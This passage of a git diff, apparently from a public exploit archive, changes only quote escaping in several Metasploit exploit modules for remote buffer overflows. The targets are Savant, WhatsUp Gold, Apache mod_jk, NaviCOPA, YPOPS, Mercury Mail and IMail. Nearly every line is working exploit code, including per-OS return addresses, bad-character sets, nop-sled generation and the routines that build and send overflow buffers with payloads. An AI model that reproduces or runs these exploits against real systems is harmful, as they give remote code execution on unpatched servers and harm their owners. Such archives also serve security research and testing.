+					[ 'BID', '5686' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/787' ],
 				],
-			\'Privileged\'  => false,
-			\'DefaultOptions\' =>
+			'Privileged'  => false,
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'thread\',
+					'EXITFUNC' => 'thread',
 				},
-			\'Payload\'	  =>
+			'Payload'	  =>
 				{
-					\'Space\'			   => 253,
-					\'BadChars\'        => \"\\x00\\x0a\\x0d\\x25\",
-					\'StackAdjustment\' => -3500,
-					\'Compat\'          =>
+					'Space'			   => 253,
+					'BadChars'        => "\x00\x0a\x0d\x25",
+					'StackAdjustment' => -3500,
+					'Compat'          =>
 						{
-							\'ConnectionType\' => \'+ws2ord\',
+							'ConnectionType' => '+ws2ord',
 						},
 				},
-			\'Platform\'    => [\'win\'],
-			\'Targets\'     =>
+			'Platform'    => ['win'],
+			'Targets'     =>
 				[
 					# Patrick - Tested OK 2007/08/08 : w2ksp0, w2ksp4, xpsp2 en.
-					[ \'Universal Savant.exe\', 	    { \'Ret\' => 0x00417a96 } ], # p/r Savant.exe
-					[ \'Windows 2000 Pro All - English\', { \'Ret\' => 0x750211aa } ], # p/r ws2help.dll
-					[ \'Windows 2000 Pro All - Italian\', { \'Ret\' => 0x74fd2ac5 } ], # p/r ws2help.dll
-					[ \'Windows 2000 Pro All - French\',  { \'Ret\' => 0x74fa36b2 } ], # p/r ws2help.dll
-					[ \'Windows XP Pro SP2 - English\',   { \'Ret\' => 0x71ab76ed } ], # p/r ws2help.dll
+					[ 'Universal Savant.exe', 	    { 'Ret' => 0x00417a96 } ], # p/r Savant.exe
+					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x750211aa } ], # p/r ws2help.dll
+					[ 'Windows 2000 Pro All - Italian', { 'Ret' => 0x74fd2ac5 } ], # p/r ws2help.dll
+					[ 'Windows 2000 Pro All - French',  { 'Ret' => 0x74fa36b2 } ], # p/r ws2help.dll
+					[ 'Windows XP Pro SP2 - English',   { 'Ret' => 0x71ab76ed } ], # p/r ws2help.dll
 				],
-			\'DisclosureDate\' => \'Sep 10 2002\',
-			\'DefaultTarget\' => 0))
+			'DisclosureDate' => 'Sep 10 2002',
+			'DefaultTarget' => 0))
 	end
 
 	def check
 		info = http_fingerprint  # check method
-		if info and (info =~ /Savant\\/3\\.1/)
+		if info and (info =~ /Savant\/3\.1/)
 			return Exploit::CheckCode::Vulnerable
 		end
 		Exploit::CheckCode::Safe
@@ -82,17 +82,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def safe_nops(count)
 		# We need to find a safe nop combination.
-		# Savant will change some chars in the http method type - anything before the \"/\".
+		# Savant will change some chars in the http method type - anything before the "/".
 		#
-		# For example, \"GET /\" will remain \"GET /\", however
-		# \"\\xe0 /\" will be modified to \"\\xc0 /\" ...
-		# \"\\xfe /\" will be modified to \"\\xde /\" ...
-		# \"\\xff /\" will be modified to \"\\x9f /\"
-		# The code after the \"/\" - our payload - is unchanged >=)
+		# For example, "GET /" will remain "GET /", however
+		# "\xe0 /" will be modified to "\xc0 /" ...
+		# "\xfe /" will be modified to "\xde /" ...
+		# "\xff /" will be modified to "\x9f /"
+		# The code after the "/" - our payload - is unchanged >=)
 		#
 		# Savant bad_chars for the nops
 
-		bad_nop_chars = [*(0xe0..0xff)].pack(\"C*\")
+		bad_nop_chars = [*(0xe0..0xff)].pack("C*")
 
 		nopsled = make_nops(count) # make_nops includes the payload bad_chars
 			bad_nop_chars.each_byte { |badbyte|
@@ -107,21 +107,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
 
 	def exploit
-		print_status(\"Searching for a suitable nopsled...\")
+		print_status("Searching for a suitable nopsled...")
 		findnop = safe_nops(24) # If we use short jump or make_nops(), sled will be corrupted.
 		until findnop
 			findnop = safe_nops(24) # If nops are banned, generate a new batch.
 		end
 
-		print_status(\"Found one! Sending exploit.\")
-		sploit = findnop + \" /\" + payload.encoded + [target[\'Ret\']].pack(\'V\')
+		print_status("Found one! Sending exploit.")
+		sploit = findnop + " /" + payload.encoded + [target['Ret']].pack('V')
 		res = send_request_raw(
 			{
-				\'method\'  => sploit,
-				\'uri\'     => \'/\'
+				'method'  => sploit,
+				'uri'     => '/'
 			}, 5)
 		if (res)
-			print_error(\'The server responded, that can\\\'t be good.\')
+			print_error('The server responded, that can\'t be good.')
 		end
 
 		handler
diff --git a/platforms/windows/remote/16787.rb b/platforms/windows/remote/16787.rb
index 1e1518dba..37d065a59 100755
--- a/platforms/windows/remote/16787.rb
+++ b/platforms/windows/remote/16787.rb
@@ -9,57 +9,57 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
 
-	# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm=\"WhatsUp Gold\" )
+	# [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" )
 	HttpFingerprint = { :pattern => [ /WhatsUp/ ] }
 
 	include Msf::Exploit::Remote::HttpClient
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Ipswitch WhatsUp Gold 8.03 Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'Ipswitch WhatsUp Gold 8.03 Buffer Overflow',
+			'Description'    => %q{
 					This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By
-				posting a long string for the value of \'instancename\' in the _maincfgret.cgi
+				posting a long string for the value of 'instancename' in the _maincfgret.cgi
 				script an attacker can overflow a buffer and execute arbitrary code on the system.
 			},
-			\'Author\'         => [ \'MC\' ],
-			\'License\'        => MSF_LICENSE,
-			\'Version\'        => \'$Revision: 9820 $\',
-			\'References\'     =>
+			'Author'         => [ 'MC' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 9820 $',
+			'References'     =>
 				[
-					[\'CVE\', \'2004-0798\'],
-					[\'OSVDB\', \'9177\'],
-					[\'BID\', \'11043\'],
+					['CVE', '2004-0798'],
+					['OSVDB', '9177'],
+					['BID', '11043'],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'thread\',
+					'EXITFUNC' => 'thread',
 				},
-			\'Privileged\'     => true,
-			\'Payload\'        =>
+			'Privileged'     => true,
+			'Payload'        =>
 				{
-					\'Space\'    => 500,
-					\'BadChars\' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",
-					\'PrependEncoder\' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",
+					'Space'    => 500,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44",
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[ \'WhatsUP Gold 8.03 Universal\', { \'Ret\' => 0x6032e743 } ], # whatsup.dll
+					[ 'WhatsUP Gold 8.03 Universal', { 'Ret' => 0x6032e743 } ], # whatsup.dll
 				],
-			\'DefaultTarget\'  => 0,
-			\'DisclosureDate\' => \'Aug 25 2004\'))
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Aug 25 2004'))
 
 		register_options(
 			[
 				Opt::RPORT(80),
-				OptString.new(\'HTTPUSER\', [ false, \'The username to authenticate as\', \'admin\']),
-				OptString.new(\'HTTPPASS\', [ false, \'The password to authenticate as\', \'admin\']),
+				OptString.new('HTTPUSER', [ false, 'The username to authenticate as', 'admin']),
+				OptString.new('HTTPPASS', [ false, 'The password to authenticate as', 'admin']),
 			], self.class )
 	end
 
@@ -67,22 +67,22 @@ class Metasploit3 < Msf::Exploit::Remote
 		c = connect
 
 		num = rand(65535).to_s
-		user_pass = \"#{datastore[\'HTTPUSER\']}\" + \":\" + \"#{datastore[\'HTTPPASS\']}\"
+		user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
 
-		req   = \"page=notify&origname=&action=return&type=Beeper&instancename=\"
-		req  << rand_text_alpha_upper(811, payload_badchars) + \"\\xeb\\x06\"
-		req  << make_nops(2) + [target.ret].pack(\'V\') + make_nops(10) + payload.encoded
-		req  << \"&beepernumber=&upcode=\" + num + \"*&downcode=\"+ num + \"*&trapcode=\" + num + \"*&end=end\"
+		req   = "page=notify&origname=&action=return&type=Beeper&instancename="
+		req  << rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
+		req  << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
+		req  << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
 
-		print_status(\"Trying target %s...\" % target.name)
+		print_status("Trying target %s..." % target.name)
 		res = send_request_cgi({
-			\'uri\'          => \'/_maincfgret.cgi\',
-			\'method\'       => \'POST\',
-			\'content-type\' => \'application/x-www-form-urlencoded\',
-			\'data\'         => req,
-			\'headers\'      =>
+			'uri'          => '/_maincfgret.cgi',
+			'method'       => 'POST',
+			'content-type' => 'application/x-www-form-urlencoded',
+			'data'         => req,
+			'headers'      =>
 			{
-				\'Authorization\' => \"Basic #{Rex::Text.encode_base64(user_pass)}\"
+				'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
 			}
 		}, 5)
 
diff --git a/platforms/windows/remote/16798.rb b/platforms/windows/remote/16798.rb
index d0e19b2bf..1e5f4cfc0 100755
--- a/platforms/windows/remote/16798.rb
+++ b/platforms/windows/remote/16798.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -19,40 +19,40 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Apache mod_jk 1.2.20 Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'Apache mod_jk 1.2.20 Buffer Overflow',
+			'Description'    => %q{
 					This is a stack buffer overflow exploit for mod_jk 1.2.20.
 				Should work on any Win32 OS.
 			},
-			\'Author\'         => \'Nicob \',
-			\'Version\'        => \'$Revision: 9929 $\',
-			\'License\'        => MSF_LICENSE,
-			\'References\'     =>
+			'Author'         => 'Nicob ',
+			'Version'        => '$Revision: 9929 $',
+			'License'        => MSF_LICENSE,
+			'References'     =>
 				[
-					[ \'CVE\', \'2007-0774\' ],
-					[ \'OSVDB\', \'33855\' ],
-					[ \'BID\', \'22791\' ],
-					[ \'URL\', \'http://www.zerodayinitiative.com/advisories/ZDI-07-008.html\' ]
+					[ 'CVE', '2007-0774' ],
+					[ 'OSVDB', '33855' ],
+					[ 'BID', '22791' ],
+					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-07-008.html' ]
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'process\',
+					'EXITFUNC' => 'process',
 				},
-			\'Privileged\'     => true,
-			\'Payload\'        =>
+			'Privileged'     => true,
+			'Payload'        =>
 				{
-					\'Space\'    => 4000,
-					\'BadChars\' => \"\\x00\\x09\\x0a\\x0b\\x0c\\x0d\\x20\\x23\\x25\\x26\\x2f\\x3b\\x3f\\x5c\",
-					\'DisableNops\' => true
+					'Space'    => 4000,
+					'BadChars' => "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c",
+					'DisableNops' => true
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
 					# POP/POP/RET in mod_jk 1.2.20 (Apache 1.3.37, 2.0.58 and 2.2.3)
-					[\'mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)\', { \'Ret\' => 0x6a6b8ef1 }],
+					['mod_jk 1.2.20 (Apache 1.3.x/2.0.x/2.2.x) (any win32 OS/language)', { 'Ret' => 0x6a6b8ef1 }],
 				],
-			\'DefaultTarget\'  => 0,
-			\'DisclosureDate\' => \'Mar 02 2007\'))
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Mar 02 2007'))
 
 		register_options(
 			[
@@ -63,12 +63,12 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		connect
 
-		sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")
+		sock.put("GET / HTTP/1.0\r\n\r\n")
 		resp = sock.get_once
 		disconnect
 
-			if (resp and (m = resp.match(/Server: Apache\\/(.*) \\(Win32\\)(.*) mod_jk\\/1.2.20/))) then
-				print_status(\"Apache version detected : #{m[1]}\")
+			if (resp and (m = resp.match(/Server: Apache\/(.*) \(Win32\)(.*) mod_jk\/1.2.20/))) then
+				print_status("Apache version detected : #{m[1]}")
 				return Exploit::CheckCode::Appears
 			else
 				return Exploit::CheckCode::Safe
@@ -78,8 +78,8 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect
 
-		uri_start  = \"GET /\"
-		uri_end    = \".html HTTP/1.0\\r\\n\\r\\n\"
+		uri_start  = "GET /"
+		uri_end    = ".html HTTP/1.0\r\n\r\n"
 		sc_base    = 16
 
 		shellcode  = payload.encoded
@@ -91,17 +91,17 @@ class Metasploit3 < Msf::Exploit::Remote
 		# 4423 : Apache/2.2.3  (Win32) mod_jk/1.2.20
 
 		[ 4343, 4407, 4423 ].each { |seh_offset|
-			sploit[seh_offset - 9, 5] = \"\\xe9\" + [sc_base - seh_offset + 4].pack(\'V\')
-			sploit[seh_offset - 4, 2] = \"\\xeb\\xf9\"
-			sploit[seh_offset    , 4] = [ target.ret ].pack(\'V\')
+			sploit[seh_offset - 9, 5] = "\xe9" + [sc_base - seh_offset + 4].pack('V')
+			sploit[seh_offset - 4, 2] = "\xeb\xf9"
+			sploit[seh_offset    , 4] = [ target.ret ].pack('V')
 		}
 
-		print_status(\"Trying target #{target.name}...\")
+		print_status("Trying target #{target.name}...")
 		sock.put(uri_start + sploit + uri_end)
 
 		resp = sock.get_once
-		if (resp and (m = resp.match(/(.*)<\\/title>/i)))
-			print_error(\"The exploit failed : HTTP Status Code \'#{m[1]}\' received :-(\")
+		if (resp and (m = resp.match(/<title>(.*)<\/title>/i)))
+			print_error("The exploit failed : HTTP Status Code '#{m[1]}' received :-(")
 		end
 
 		handler
diff --git a/platforms/windows/remote/16808.rb b/platforms/windows/remote/16808.rb
index d2670be31..ae8c6e667 100755
--- a/platforms/windows/remote/16808.rb
+++ b/platforms/windows/remote/16808.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -20,39 +20,39 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'NaviCOPA 2.0.1 URL Handling Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'NaviCOPA 2.0.1 URL Handling Buffer Overflow',
+			'Description'    => %q{
 				This module exploits a stack buffer overflow in NaviCOPA 2.0.1.
 				The vulnerability is caused due to a boundary error within the
 				handling of URL parameters.
 			},
-			\'Author\'         => \'MC\',
-			\'License\'        => MSF_LICENSE,
-			\'Version\'        => \'$Revision: 9797 $\',
-			\'References\'     =>
+			'Author'         => 'MC',
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 9797 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2006-5112\' ],
-					[ \'OSVDB\', \'29257\' ],
-					[ \'BID\', \'20250\' ],
+					[ 'CVE', '2006-5112' ],
+					[ 'OSVDB', '29257' ],
+					[ 'BID', '20250' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'thread\',
+					'EXITFUNC' => 'thread',
 				},
-			\'Privileged\'     => true,
-			\'Payload\'        =>
+			'Privileged'     => true,
+			'Payload'        =>
 				{
-					\'Space\'    => 400,
-					\'BadChars\' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\",
-					\'StackAdjustment\' => -3500,
+					'Space'    => 400,
+					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
+					'StackAdjustment' => -3500,
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[\'NaviCOPA 2.0.1 Universal\', { \'Ret\' => 0x1009b4ff }], # IV320009.dll
+					['NaviCOPA 2.0.1 Universal', { 'Ret' => 0x1009b4ff }], # IV320009.dll
 				],
-			\'DisclosureDate\' => \'Sep 28 2006\',
-			\'DefaultTarget\'  => 0))
+			'DisclosureDate' => 'Sep 28 2006',
+			'DefaultTarget'  => 0))
 
 		register_options(
 			[
@@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def check
 		connect
 
-		sock.put(\"GET / HTTP/1.0\\r\\n\\r\\n\")
+		sock.put("GET / HTTP/1.0\r\n\r\n")
 		resp = sock.get_once
 		disconnect
 
@@ -77,13 +77,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		connect
 
 		sploit =  rand_text_alphanumeric(228, payload_badchars)
-		sploit << [target.ret].pack(\'V\') + payload.encoded
+		sploit << [target.ret].pack('V') + payload.encoded
 
-		uri = \'/\' + sploit
+		uri = '/' + sploit
 
-		res = \"GET #{uri} HTTP/1.1\\r\\n\\r\\n\"
+		res = "GET #{uri} HTTP/1.1\r\n\r\n"
 
-		print_status(\"Trying target %s\" % target.name)
+		print_status("Trying target %s" % target.name)
 
 		sock.put(res)
 		sock.close
diff --git a/platforms/windows/remote/16818.rb b/platforms/windows/remote/16818.rb
index 8c79e2c8e..9f1958980 100755
--- a/platforms/windows/remote/16818.rb
+++ b/platforms/windows/remote/16818.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,8 +18,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'YPOPS 0.6 Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'YPOPS 0.6 Buffer Overflow',
+			'Description'    => %q{
 					This module exploits a stack buffer overflow in the YPOPS POP3
 				service.
 
@@ -27,53 +27,53 @@ class Metasploit3 < Msf::Exploit::Remote
 				Possibly Affected version 0.5, 0.4.5.1, 0.4.5. Eip point to
 				jmp ebx opcode in ws_32.dll
 			},
-			\'Author\'         => [ \'acaro <acaro@jervus.it>\' ],
-			\'Version\'        => \'$Revision: 9262 $\',
-			\'References\'     =>
+			'Author'         => [ 'acaro <acaro@jervus.it>' ],
+			'Version'        => '$Revision: 9262 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2004-1558\'],
-					[ \'OSVDB\', \'10367\'],
-					[ \'BID\', \'11256\'],
-					[ \'URL\', \'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html\'],
+					[ 'CVE', '2004-1558'],
+					[ 'OSVDB', '10367'],
+					[ 'BID', '11256'],
+					[ 'URL', 'http://www.securiteam.com/windowsntfocus/5GP0M2KE0S.html'],
 				],
-			\'Platform\'       => \'win\',
-			\'Privileged\'     => false,
-			\'Payload\'        =>
+			'Platform'       => 'win',
+			'Privileged'     => false,
+			'Payload'        =>
 				{
-					\'Space\'    => 1200,
-					\'BadChars\' => \"\\x00\\x25\",
-					\'MinNops\'  => 106,
+					'Space'    => 1200,
+					'BadChars' => "\x00\x25",
+					'MinNops'  => 106,
 				},
-			\'Targets\'        =>
+			'Targets'        =>
 				[
-					[ \'Windows 2000 SP0 Italian\',   { \'Ret\' => 0x74fe6113, \'Offset\' => 503 }, ],
-					[ \'Windows 2000 Advanced Server Italian SP4\', { \'Ret\' => 0x74fe16e2, \'Offset\' => 503 }, ],
-					[ \'Windows 2000 Advanced Server SP3 English\', { \'Ret\' => 0x74fe22f3, \'Offset\' => 503 }, ],
-					[ \'Windows 2000 SP0 English\',   { \'Ret\' => 0x75036113, \'Offset\' => 503 }, ],
-					[ \'Windows 2000 SP1 English\',   { \'Ret\' => 0x750317b2, \'Offset\' => 503 }, ],
-					[ \'Windows 2000 SP2 English\',   { \'Ret\' => 0x7503435b, \'Offset\' => 503 }, ],
-					[ \'Windows 2000 SP3 English\',   { \'Ret\' => 0x750322f3, \'Offset\' => 503 }, ],
-					[ \'Windows 2000 SP4 English\',   { \'Ret\' => 0x750316e2, \'Offset\' => 503 }, ],
-					[ \'Windows XP SP0-SP1 English\', { \'Ret\' => 0x71ab1636, \'Offset\' => 503 }, ],
-					[ \'Windows XP SP2 English\',     { \'Ret\' => 0x71ab773b, \'Offset\' => 503 }, ],
-					[ \'Windows 2003 SP0 English\',   { \'Ret\' => 0x71c04202, \'Offset\' => 503 }, ],
-					[ \'Windows 2003 SP1 English\',   { \'Ret\' => 0x71c05fb0, \'Offset\' => 503 }, ],
+					[ 'Windows 2000 SP0 Italian',   { 'Ret' => 0x74fe6113, 'Offset' => 503 }, ],
+					[ 'Windows 2000 Advanced Server Italian SP4', { 'Ret' => 0x74fe16e2, 'Offset' => 503 }, ],
+					[ 'Windows 2000 Advanced Server SP3 English', { 'Ret' => 0x74fe22f3, 'Offset' => 503 }, ],
+					[ 'Windows 2000 SP0 English',   { 'Ret' => 0x75036113, 'Offset' => 503 }, ],
+					[ 'Windows 2000 SP1 English',   { 'Ret' => 0x750317b2, 'Offset' => 503 }, ],
+					[ 'Windows 2000 SP2 English',   { 'Ret' => 0x7503435b, 'Offset' => 503 }, ],
+					[ 'Windows 2000 SP3 English',   { 'Ret' => 0x750322f3, 'Offset' => 503 }, ],
+					[ 'Windows 2000 SP4 English',   { 'Ret' => 0x750316e2, 'Offset' => 503 }, ],
+					[ 'Windows XP SP0-SP1 English', { 'Ret' => 0x71ab1636, 'Offset' => 503 }, ],
+					[ 'Windows XP SP2 English',     { 'Ret' => 0x71ab773b, 'Offset' => 503 }, ],
+					[ 'Windows 2003 SP0 English',   { 'Ret' => 0x71c04202, 'Offset' => 503 }, ],
+					[ 'Windows 2003 SP1 English',   { 'Ret' => 0x71c05fb0, 'Offset' => 503 }, ],
 				],
-			\'DisclosureDate\' => \'Sep 27 2004\'))
+			'DisclosureDate' => 'Sep 27 2004'))
 	end
 
 	def check
 		connect
 		disconnect
 
-		banner.gsub!(/\\n/, \'\')
+		banner.gsub!(/\n/, '')
 
 		if banner =~ /YahooPOPs! Simple Mail Transfer Service Ready/
-			print_status(\"Vulnerable SMTP server: #{banner}\")
+			print_status("Vulnerable SMTP server: #{banner}")
 			return Exploit::CheckCode::Detected
 		end
 
-		print_status(\"Unknown SMTP server: #{banner}\")
+		print_status("Unknown SMTP server: #{banner}")
 		return Exploit::CheckCode::Safe
 	end
 
@@ -81,12 +81,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		connect
 
 		pattern =
-			rand_text_alpha(target[\'Offset\'] - payload.encoded.length) +
+			rand_text_alpha(target['Offset'] - payload.encoded.length) +
 			payload.encoded +
-			[target.ret].pack(\'V\') +
-			\"\\n\"
+			[target.ret].pack('V') +
+			"\n"
 
-		print_status(\"Trying #{target.name} using jmp ebx at #{\"0x%.8x\" % target.ret}\")
+		print_status("Trying #{target.name} using jmp ebx at #{"0x%.8x" % target.ret}")
 
 		sock.put(pattern)
 
diff --git a/platforms/windows/remote/16821.rb b/platforms/windows/remote/16821.rb
index 1b775ec9e..b951fe0e9 100755
--- a/platforms/windows/remote/16821.rb
+++ b/platforms/windows/remote/16821.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GreatRanking
@@ -18,38 +18,38 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow',
+			'Description'    => %q{
 					This module exploits a stack buffer overflow in Mercury Mail Transport System 4.51.
 				By sending a specially crafted argument to the AUTH CRAM-MD5 command, an attacker
 				may be able to execute arbitrary code.
 			},
-			\'Author\'         => [ \'MC\' ],
-			\'Version\'        => \'$Revision: 9583 $\',
-			\'References\'     =>
+			'Author'         => [ 'MC' ],
+			'Version'        => '$Revision: 9583 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2007-4440\' ],
-					[ \'OSVDB\', \'39669\' ],
-					[ \'BID\', \'25357\' ],
+					[ 'CVE', '2007-4440' ],
+					[ 'OSVDB', '39669' ],
+					[ 'BID', '25357' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'thread\',
+					'EXITFUNC' => 'thread',
 				},
-			\'Platform\'       => \'win\',
-			\'Privileged\'     => true,
-			\'Payload\'        =>
+			'Platform'       => 'win',
+			'Privileged'     => true,
+			'Payload'        =>
 				{
-					\'Space\'    => 600,
-					\'BadChars\' => \"\\x00\\x0a\\x0d\\x20\\x25\",
-					\'StackAdjustment\' => -3500,
+					'Space'    => 600,
+					'BadChars' => "\x00\x0a\x0d\x20\x25",
+					'StackAdjustment' => -3500,
 				},
-			\'Targets\'        =>
+			'Targets'        =>
 				[
-					[ \'Mercury Mail Transport System 4.51\',	{ \'Ret\' => 0x258d0d1e } ], # ter32.dll
+					[ 'Mercury Mail Transport System 4.51',	{ 'Ret' => 0x258d0d1e } ], # ter32.dll
 				],
-			\'DefaultTarget\'  => 0,
-			\'DisclosureDate\' => \'Aug 18 2007\'))
+			'DefaultTarget'  => 0,
+			'DisclosureDate' => 'Aug 18 2007'))
 
 		register_options([ Opt::RPORT(25) ], self.class)
 	end
@@ -59,22 +59,22 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		sock.get_once
 
-		sock.put(\"EHLO\\r\\n\")
+		sock.put("EHLO\r\n")
 
 		sock.get_once
 
-		sock.put(\"AUTH CRAM-MD5\\r\\n\")
+		sock.put("AUTH CRAM-MD5\r\n")
 
 		sock.get_once
 		select(nil,nil,nil,0.25)
 
-		buffer =  rand_text_alpha_upper(204) + [target.ret].pack(\'V\')
+		buffer =  rand_text_alpha_upper(204) + [target.ret].pack('V')
 		buffer << payload.encoded + rand_text_alpha_upper(1075 - payload.encoded.length)
 
 		sploit = Rex::Text.encode_base64(buffer)
 
-		print_status(\"Trying target #{target.name}...\")
-		sock.put(sploit + \"\\r\\n\")
+		print_status("Trying target #{target.name}...")
+		sock.put(sploit + "\r\n")
 
 		handler
 		disconnect
diff --git a/platforms/windows/remote/16824.rb b/platforms/windows/remote/16824.rb
index b801d7c32..0242fc9d4 100755
--- a/platforms/windows/remote/16824.rb
+++ b/platforms/windows/remote/16824.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \\\'msf/core\\\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = AverageRanking
@@ -18,36 +18,36 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\\\'Name\\\'           => \\\'IMail LDAP Service Buffer Overflow\\\',
-			\\\'Description\\\'    => %q{
+			'Name'           => 'IMail LDAP Service Buffer Overflow',
+			'Description'    => %q{
 					This exploits a buffer overflow in the LDAP service that is
 				part of the IMail product. This module was tested against
 				version 7.10 and 8.5, both running on Windows 2000.
 			},
-			\\\'Author\\\'         => [ \\\'hdm\\\' ],
-			\\\'License\\\'        => MSF_LICENSE,
-			\\\'Version\\\'        => \\\'$Revision: 9179 $\\\',
-			\\\'References\\\'     =>
+			'Author'         => [ 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision: 9179 $',
+			'References'     =>
 				[
-					[ \\\'CVE\\\', \\\'2004-0297\\\'],
-					[ \\\'OSVDB\\\', \\\'3984\\\'],
-					[ \\\'BID\\\', \\\'9682\\\'],
-					[ \\\'URL\\\', \\\'http://secunia.com/advisories/10880/\\\'],
+					[ 'CVE', '2004-0297'],
+					[ 'OSVDB', '3984'],
+					[ 'BID', '9682'],
+					[ 'URL', 'http://secunia.com/advisories/10880/'],
 				],
-			\\\'Privileged\\\'     => false,
-			\\\'Payload\\\'        =>
+			'Privileged'     => false,
+			'Payload'        =>
 				{
-					\\\'Space\\\'    => 1024,
-					\\\'BadChars\\\' => \\\"\\\\x00\\\\x0a\\\\x0d\\\\x20\\\",
+					'Space'    => 1024,
+					'BadChars' => "\x00\x0a\x0d\x20",
 				},
-			\\\'Platform\\\'       => \\\'win\\\',
-			\\\'Targets\\\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[\\\"Windows 2000 English\\\",   { \\\'Ret\\\' => 0x75023386 }],
-					[\\\"Windows 2000 IMail 8.x\\\", { \\\'Ret\\\' => 0x1002a619 }],
+					["Windows 2000 English",   { 'Ret' => 0x75023386 }],
+					["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }],
 				],
-			\\\'DisclosureDate\\\' => \\\'Feb 17 2004\\\',
-			\\\'DefaultTarget\\\' => 0))
+			'DisclosureDate' => 'Feb 17 2004',
+			'DefaultTarget' => 0))
 
 		register_options(
 			[
@@ -58,16 +58,16 @@ class Metasploit3 < Msf::Exploit::Remote
 	def exploit
 		connect
 
